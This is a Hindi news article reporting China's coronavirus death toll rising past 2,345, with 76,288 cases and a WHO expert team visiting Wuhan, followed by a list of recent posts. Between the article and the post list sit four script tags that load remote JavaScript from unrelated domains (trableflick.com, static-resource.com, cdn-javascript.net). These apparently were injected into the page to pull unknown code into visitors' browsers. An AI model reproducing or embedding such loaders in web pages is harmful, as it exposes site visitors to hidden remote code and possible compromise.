Categories: वर्ल्ड

चीन में कोरोना वायरस से मरने वालों की संख्या 2 हजार 300 के पार

<p>विश्व स्वास्थ्य संगठन (डब्ल्यूएचओ) के विशेषज्ञों ने शनिवार को चीन के वुहान शहर का दौरा किया जो कि कोरोना वायरस के प्रकोप का मुख्य केंद्र है। वहीं, चीन में कोरोना वायरस के कारण 109 और लोगों की मौत के साथ ही इस से मरने वालों की संख्या बढ़कर 2,345 हो गई है। वहीं कोरोना वायरस से संक्रमण के मामलों की संख्या बढ़कर 76,288 हो गई है। यह जानकारी चीन के स्वास्थ्य अधिकारियों ने दी। चीन के स्वास्थ्य प्राधिकारी ने बताया कि शुक्रवार को कुल 397 लोगों में कोविड-19 की पुष्टि हुई है जबकि 31 प्रांतीय स्तर के क्षेत्रों से 109 लोगों की मौत होने की खबर मिली है।</p>

<p>राष्ट्रीय स्वास्थ्य आयोग (एनएचसी) की नियमित रिपोर्ट में शनिवार को कहा गया है कि शुक्रवार तक बीमारी से कुल 2,345 लोगों की मौत हो गई और देश भर के 76,288 लोगों में कोरोना वायरस के संक्रमण की पुष्टि हुई है। रिपोर्ट के अनुसार इनमें से 106 मौत वायरस के केंद्र हुबेई प्रांत में, वहीं एक-एक मौत हेबई, शंघाई और शिनजियांग प्रांत में हुई है।प्रांतीय स्वास्थ्य आयोग ने बताया कि हुबेई प्रांत में शुक्रवार को 106 मौतों के साथ ही 366 और लोगों में संक्रमण की पुष्टि हुई है।इसमें बताया गया कि नयी रिपोर्ट के मुताबिक सर्वाधिक प्रभावित प्रांत में 63,454 लोगों में संक्रमण की पुष्टि हुई है।</p>

<p>डब्ल्यूएचओ से जनस्वास्थ्य विशेषज्ञों की एक टीम ने इस वायरस के बारे में विस्तृत जांच के लिए हुबेई प्रांत की राजधानी वुहान का दौरा किया। यह वायरस गत वर्ष दिसम्बर में कथित तौर पर एक &lsquo;सीफूड&rsquo; बाजार से उभरा था। राष्ट्रीय स्वास्थ्य आयोग ने कहा कि डब्ल्यूएचओ विशेषज्ञों ने अपने चीनी समकक्षों के साथ एक संयुक्त जांच दल बनाया है और वुहान में स्थानीय स्वास्थ्य प्राधिकारियों के साथ बातचीत की है। इस दल ने स्वास्थ्य देखभाल संस्थानों का दौरा किया।हांगकांग स्थित &lsquo;साउथ चाइना मार्निंग पोस्ट&rsquo; ने बताया कि दल में अमेरिका, जर्मनी, जापान, नाइजीरिया, रूस, सिंगापुर और दक्षिण कोरिया के विशेषज्ञ शामिल हैं।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1582430018129″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

हिरासत में सोनम वांगचुक का अनिश्चितकालीन अनशन शुरू, मचा सियासी घमासान, दिल्‍ली सीएम को मिलने से रोका

New Delhi/ Agencies: जलवायु कार्यकर्ता सोनम वांगचुक और दिल्ली सीमा पर हिरासत में लिये गए…

48 mins ago

iPhone डिलीवरी के बाद कैश देने के बजाय कर दी डिलीवरी बॉय की हत्या

  Allahbad/Agencies: उत्तर प्रदेश की राजधानी में 30 वर्षीय एक डिलीवरी ब्वाय की हत्या कर…

1 hour ago

Boss बना रहे थे टार्गेट पूरा करने का दवाब, एरिया मैनेजर ने फंदे से लटककर दे दी जान

सुसाइड नोट पर उच्‍चाधिकारियों पर आरोप पत्‍नी की तरफ से दी शिकायत पर मामला दर्ज…

2 hours ago

हिमाचल पुलिस में कांस्‍टेबल नहीं अब कमांडो भर्ती, नवरात्र में लोक सेवा आयोग भर्ती जारी करेगा विज्ञापन

  Shimla: हिमाचल पुलिस में कमांडो भर्ती होगी। कांस्‍टेबल के बदले भर्ती हो रही इस…

4 hours ago

हिमाचल पुलिस में कांस्‍टेबल नहीं अब कमांडो भर्ती, नवरात्र में लोक सेवा आयोग जारी करेगा विज्ञापन

  Shimla: हिमाचल पुलिस में कमांडो भर्ती होगी। कांस्‍टेबल के बदले भर्ती हो रही इस…

4 hours ago

शिव सेना नेता और अभिनेता गोविंदा को लगी अपनी ही रिवॉल्वर से गोली, अस्पताल में भर्ती

New Delhi: बॉलीवुड एक्टर और शिव सेना लीडर गोविंदा अपनी ही रिवॉल्वर से पैर में…

5 hours ago